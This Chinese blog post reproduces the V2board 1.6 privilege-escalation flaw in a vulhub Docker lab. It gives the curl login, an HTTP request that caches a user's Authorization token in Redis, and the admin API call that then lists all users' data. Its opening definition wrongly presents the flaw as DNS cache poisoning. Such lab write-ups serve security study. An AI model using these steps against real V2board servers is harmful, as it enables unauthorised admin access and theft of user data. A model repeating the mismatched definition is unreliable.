V2board缓存投毒漏洞复现

1.什么是缓存投毒

缓存投毒(Cache poisoning),通常也称为域名系统投毒(domain name system poisoning),或DNS缓存投毒(DNS cache poisoning)。它是利用虚假Internet地址替换掉域名系统表中的地址,进而制造破坏。当网络用户在带有该虚假地址的页面中进行搜寻,以访问某链接时,网页浏览器由于受到该虚假条目的影响而打开了不同的网页链接。在这种情况下,蠕虫、木马、浏览器劫持等恶意软件就可能会被下载到本地用户的电脑上。

------百度

关于v2board的相关漏洞信息和文件在此链接https://github.com/vulhub/vulhub/tree/master/v2board/1.6-privilege-escalation

2.复现漏洞

1.首先 建立一个目录,复制以下两个脚本文件

2. 建立完成后,利用docker创建复现环境

docker compose up -d

下载完成后输入IP地址加端口号即可看见登录界面

3.自行注册一个账号

然后,将电子邮件和密码替换为您自己的数据并登录:

curl -i -s -k -XPOST --data-binary "email=123@123.com&password=12345678"http://localhost:9090/api/v1/passport/auth/login

得到如下auth_data码

4.打开bp抓包,将带有auth_data码的request包放入其中

GET /api/v1/user/info HTTP/1.1

Host: localhost:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36

Connection: close

Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E=

Cache-Control: max-age=0

即可得出该用户的信息

此步骤是让服务器将您的授权保存到 Redis 缓存。

最后,可以简单地使用此授权调用所有管理员 API,例如 http://your-ip:8080/api/v1/admin/user/fetch

我们利用管理员的api将所有用户信息一一列出,漏洞复现大功告成!!!

相关推荐
高梦轩2 小时前
MySQL高可用
android·运维·数据库
孟章豪5 小时前
《SQL拼接 vs 参数化,为什么公司禁止拼接SQL?(附真实案例)》
服务器·数据库·sql
hsjcjh6 小时前
Nodemailer使用教程:在Node.js中发送电子邮件
linux·运维·node.js
没有梦想的咸鱼185-1037-16636 小时前
北斗高精度数据解算:破解城市峡谷/长基线/无网区难题,从毫米级定位到自动化交付——(GAMIT/GLOBK底层核心解算技术方法)
运维·arcgis·数据分析·自动化
不怕犯错,就怕不做7 小时前
linux 如何查看自己的帐号密码及samba的帐号和密码
linux·运维·服务器
实在智能RPA7 小时前
Agent 在物流行业能实现哪些自动化?——深度拆解 AI Agent 驱动的智慧物流新范式
运维·人工智能·ai·自动化
张3237 小时前
Linux 启动过程
linux·运维
李彦亮老师(本人)7 小时前
Rocky Linux 9.x 新特性详解
linux·运维·服务器·centos·rocky linux
NiKick8 小时前
在Linux系统上使用nmcli命令配置各种网络(有线、无线、vlan、vxlan、路由、网桥等)
linux·服务器·网络